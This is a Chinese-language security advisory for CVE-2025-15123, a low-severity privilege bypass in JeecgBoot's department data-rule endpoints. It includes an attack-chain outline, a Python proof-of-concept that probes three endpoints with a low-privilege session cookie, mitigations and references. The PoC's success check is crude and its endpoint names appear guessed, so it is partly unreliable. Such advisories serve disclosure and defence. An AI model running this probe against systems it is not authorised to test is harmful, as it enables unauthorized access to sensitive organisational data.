CVE-2025-15123 JeecgBoot 权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-15123

漏洞类型

权限绕过/不当授权

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JeecgBoot

漏洞概述

CVE-2025-15123是JeecgBoot企业级低代码平台中的一个权限绕过漏洞。该漏洞存在于/sys/sysDepartPermission/datarule/路径下的未知函数中，攻击者可以通过构造特定的请求绕过正常的权限检查机制，获取未经授权的访问权限。该漏洞影响JeecgBoot 3.9.0及以下版本，CVSS评分为3.1（低危级别）。虽然该漏洞需要低权限用户身份，但攻击者可以在无需用户交互的情况下远程发起攻击。由于攻击复杂度较高且利用难度较大，漏洞的实际利用风险相对可控，但已公开披露，厂商尚未做出响应，建议用户及时采取防御措施。

技术细节

该漏洞属于典型的权限验证缺陷（Broken Access Control）。JeecgBoot在处理/sys/sysDepartPermission/datarule/路径的请求时，未正确验证当前用户的权限范围。攻击者通过构造特定的API请求，可以绕过前端权限控制或服务端权限校验逻辑，实现对原本无权限访问的功能或数据的访问。具体而言，漏洞可能存在于数据权限规则的校验环节，当系统处理部门数据权限相关请求时，未充分验证请求者是否真正拥有所请求数据的访问权限。由于该漏洞影响的是权限控制层面，攻击者可能借此获取敏感部门信息或业务数据。

攻击链分析

STEP 1

步骤1

攻击者获取JeecgBoot系统的低权限账户（如普通用户账号）

STEP 2

步骤2

攻击者使用该低权限账户登录系统并获取有效的会话Cookie

STEP 3

步骤3

攻击者构造针对/sys/sysDepartPermission/datarule/路径的恶意请求

STEP 4

步骤4

由于系统未正确校验权限，攻击者绕过访问控制获取敏感部门权限数据

STEP 5

步骤5

攻击者利用获取的权限信息进行进一步横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15123 PoC - JeecgBoot Privilege Bypass
# Target: JeecgBoot <= 3.9.0
# Endpoint: /sys/sysDepartPermission/datarule/

def exploit(target_url, cookie=None):
    """
    Exploit for CVE-2025-15123 - JeecgBoot privilege bypass
    Requires low-privilege user authentication
    """
    # Target endpoint vulnerable to privilege bypass
    endpoints = [
        "/sys/sysDepartPermission/datarule/list",
        "/sys/sysDepartPermission/datarule/query",
        "/sys/sysDepartPermission/datarule/getAllDepartPermission"
    ]
    
    headers = {
        "Content-Type": "application/json"
    }
    
    if cookie:
        headers["Cookie"] = cookie
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Attempt to access restricted data permission endpoint
            response = requests.get(url, headers=headers, timeout=10)
            
            if response.status_code == 200:
                # Check if we got unauthorized access to sensitive data
                if "data" in response.text or "depart" in response.text.lower():
                    print(f"[+] VULNERABLE: {url}")
                    print(f"[+] Response: {response.text[:500]}")
                    return True
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Protected: {url} - Status: {response.status_code}")
        except Exception as e:
            print(f"[!] Error testing {url}: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15123.py <target_url> [cookie]")
        print("Example: python cve-2025-15123.py http://target.com 'JSESSIONID=xxx'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2] if len(sys.argv) > 2 else None
    
    print(f"[*] Testing CVE-2025-15123 on {target}")
    exploit(target, cookie)

影响范围

JeecgBoot <= 3.9.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制对/sys/sysDepartPermission/datarule/路径的访问，仅允许管理员IP访问；2) 启用应用层访问日志监控，及时发现异常权限访问行为；3) 对非必要用户暂时禁用部门数据权限相关功能；4) 在反向代理层配置URL访问白名单；5) 加强对低权限账户的审计和管理，防止账户被滥用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15123
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15123
3 Details https://www.cvedetails.com/cve/CVE-2025-15123/
4 VulDB https://vuldb.com/cve/CVE-2025-15123
5 Link https://github.com/Hwwg/cve/issues/36
6 Link https://vuldb.com/?ctiid.338501
7 Link https://vuldb.com/?id.338501
8 Link https://vuldb.com/?submit.711775